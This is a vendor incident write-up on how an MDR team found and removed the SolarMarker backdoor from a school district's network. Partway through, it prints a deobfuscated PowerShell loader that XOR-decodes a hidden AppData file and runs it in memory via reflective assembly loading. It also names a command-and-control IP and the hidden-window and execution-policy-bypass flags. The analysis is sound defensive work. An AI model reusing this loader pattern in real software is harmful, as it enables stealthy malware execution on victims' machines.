In early 2024, a large K-12 school district partnered with ThreatDown MDR to strengthen its cybersecurity posture. Shortly after onboarding, ThreatDown MDR analysts detected unusual patterns of activity subsequently identified as the work of SolarMarker, a sophisticated backdoor. It became evident that SolarMarker had been present in the district’s system since at least 2021, likely exfiltrating data over several years.
Let’s dive further into the investigation’s findings and the steps taken to mitigate the threat.
SolarMarker infection
Background
The incident began with the detection of an anomalous instance of PowerShell attempting to establish an outbound network connection to a suspicious IP address (188.241.83.61). This connection attempt was thwarted by Malwarebytes Web Protection (MWAC), signaling the first indication of a potential security breach.
Initial challenges
Upon investigation, it was discovered that Endpoint Detection and Response (EDR) settings were disabled in the client’s endpoint policy. This limitation prevented the use of Fast Response Scanning (FRS) to capture and analyze detailed endpoint data, necessitating a manual approach to the investigation utilizing Active Response Scanning (ARS).
Investigation and analysis
The first step involved querying active network connections with netstat, which revealed an instance of PowerShell in operation. To further understand the nature of this PowerShell instance, its command line was examined using Windows Management Instrumentation Command-line (WMIC) with the process ID (PID), which unveiled obfuscated code.
Decoding and understanding SolarMarker
The obfuscated PowerShell code was extracted and refactored for clarity. The analysis revealed the following components of the malware’s operation:
powershell
$decodeKey = '<Base64_encoded_string>'
$encodedFilePath = 'C:\Users\akeith\AppData\Roaming\micROSoft\wbpgVnSBjsytaokm\JqdVQplHfgwxyNmtaPX.gvzPlATqFe'
$decodedPayload = [System.IO.File]::ReadAllBytes($encodedFilePath)
for ($payloadIndex = 0; $payloadIndex -lt $decodedPayload.Count; $payloadIndex++) {
$decodedPayload[$payloadIndex] = $decodedPayload[$payloadIndex] -bxor $decodeKey[$payloadIndex % $decodeKey.Length]
if ($payloadIndex -ge $decodeKey.Length) {
$payloadIndex = $decodeKey.Length
}
}
[System.Reflection.Assembly]::Load($decodedPayload)
[ab821408b424418fa94bb4d815b4e.ad0682a943e4859ef35309cc0a537]::a1f5abfa214411baa77e25f6ceaa6()
This code reveals the malware’s methodology:
- It utilizes a Base64-encoded string as a decryption key.
- It targets a specific file path for encoded data.
- It reads, decodes, and executes the encrypted payload.
The command line shows signs of the malicious script execution, with parameters indicative of a desire to hide the window (-WindowStyle Hidden), bypass execution policies (-Ep ByPass), and run encoded commands (-ComMand “sa43…).
Further investigation uncovered randomly named folders within the AppData\Roaming\Microsoft directory, each containing encoded payloads. These discoveries suggested a more widespread infection than initially anticipated.
Response and mitigation
The response involved several steps to contain and eliminate the threat:
- Terminating the malicious PowerShell instance.
- Deleting the identified folders containing encoded payloads.
- Conducting a thorough search for persistence mechanisms, which fortunately yielded no findings.
A comprehensive threat scan was executed, and the incident was escalated for visibility with the client. Post-reboot checks confirmed the absence of persistence, no spawn of new PowerShell instances, and blocking of suspicious network connections, indicating successful remediation of the infection.
Conclusion
As we’ve seen in our 2024 State of Ransomware in Education report, the educational sector continues to be a prime target for attackers. In this case, attackers used SolarMarker, a sophisticated backdoor, to lurk within the school district’s network for years, likely stealing data in the process. Its presence went undetected until the district onboarded with ThreatDown MDR. Despite facing initial obstacles, such as disabled EDR settings, the ThreatDown MDR team successfully identified and neutralized the SolarMarker infection through manual intervention.
Discover how ThreatDown MDR can safeguard your K-12 institution.
